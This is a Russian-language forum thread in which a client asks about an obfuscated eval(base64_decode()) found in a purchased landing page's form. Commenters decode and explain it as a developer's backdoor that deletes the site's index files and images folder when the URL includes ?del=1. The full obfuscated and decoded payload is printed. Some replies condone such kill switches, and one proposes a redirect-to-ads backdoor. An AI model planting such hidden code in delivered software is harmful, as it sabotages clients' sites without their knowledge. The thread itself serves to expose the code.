Объясните плиз, что тут eval(base64_decode())?

Question

[Ali Али]

Заказал одностраничную сайт (LP), там есть форма для отправка заявок на почте, и самый низ этой форме есть такой код шифрованный

eval(base64_decode('CmlmKGlzc2V0KCRfR0VUKSkgewoJIAoJIGlmKGlzc2V0KCRfR0VUWydkZWwnXSkgJiYgJF9HRVRbJ2RlbCddID09IDEpIHsKCQkgCgkJIGZ1bmN0aW9uIHJlbW92ZURpcmVjdG9yeSgkZGlyKSB7CgkJICAgICBpZiAoJG9ianMgPSBnbG9iKCRkaXIuIi8qIikpIHsKCQkgICAgICAgIGZvcmVhY2goJG9ianMgYXMgJG9iaikgewoJCSAgICAgICAgICBpc19kaXIoJG9iaikgPyByZW1vdmVEaXJlY3RvcnkoJG9iaikgOiB1bmxpbmsoJG9iaik7CgkJIAkJICAgICAgICB9CgkJICAgICB9CgkJICAgICBybWRpcigkZGlyKTsKCQkgICB9CgkJIAoJCSAvLyBpbmRleC5odG1sIAoJCSBpZihmaWxlX2V4aXN0cygnLi4vaW5kZXguaHRtbCcpKSB7CgkJCSB1bmxpbmsoJy4uL2luZGV4Lmh0bWwnKTsKCQkgfQoJCSAKCQkgLy8gaW5kZXgucGhwIAoJCSBpZihmaWxlX2V4aXN0cygnLi4vaW5kZXgucGhwJykpIHsKCQkJIHVubGluaygnLi4vaW5kZXgucGhwJyk7CgkJIH0KCQkgCgkJIC8vIGltYWdlcyAKCQkgaWYoaXNfZGlyKCcuLi9pbWFnZXMnKSkgewoJCQkgcmVtb3ZlRGlyZWN0b3J5KCcuLi9pbWFnZXMnKTsKCQkgfQoJIH0KCQp9'));

После расшифровка получил этот код:

Результат: 
if(isset($_GET)) {

if(isset($_GET['del']) && $_GET['del'] == 1) {

function removeDirectory($dir) {
if ($objs = glob($dir."/*")) {
foreach($objs as $obj) {
is_dir($obj) ? removeDirectory($obj) : unlink($obj);
}
}
rmdir($dir);
}

// index.html 
if(file_exists('../index.html')) {
unlink('../index.html');
}

// index.php 
if(file_exists('../index.php')) {
unlink('../index.php');
}

// images 
if(is_dir('../images')) {
removeDirectory('../images');
}
}

}

Скажите пожалуйста на что влияет и как тестировать этот код?

Comments

[Дмитрий Ларин]

Судя по всему разработчик добавил этот код. Если перейти в на сайт и добавить в url ?del=1 то будет удалена папка images и файлы index.php и index.html. Учитывая что это одностраничник то будет удален сайт. Подозреваю это его лазейка на случай если не оплатят разработку.

[Ali Али]

Дмитрий Ларин, работает

[Максим Тимофеев]

Ali_1, либо прав не хватает либо путь не верный

[Ali Али]

Максим Тимофеев, да, да, я не правильно пут указал, работает ))))

[Ali Али]

Дмитрий Ларин, работает ))) Спасибо

[profesor08]

Так себе бэкдор. Чуть что и все сломается, а точнее слишком мало ситуаций, когда это дело отработает как надо.

[Максим Тимофеев]

profesor08, другие варианты будут явно взломом. Тут же хитрый доп функционал. Однако я не сторонник таких методов, в челом лучше построить договорные отношения так, что бы в этом не было необходимости.

[Дмитрий Pacification]

Как по мне, лучше было бы через бэкдор делать редирект на какой-то свой сайт и показывать рекламу юзеру и за количество показов получать деньги ))

Answer 1

[d-stream]

Если вкратце - то "удаление всего". На мой взгляд стоит побить разработчика, желательно ногами.

Comments

[Vilintritenmert]

Наверное backdor на случай не уплаты за работу.

[d-stream]

Vilintritenmert, ага - прямо 273УК

Answer 2

[Programmir]

Я только помню, что eval is evil

Answer 3

[Egorr]

Это разработчики делают иногда как наказание за нечистоплотность заказчика. Сам грешен.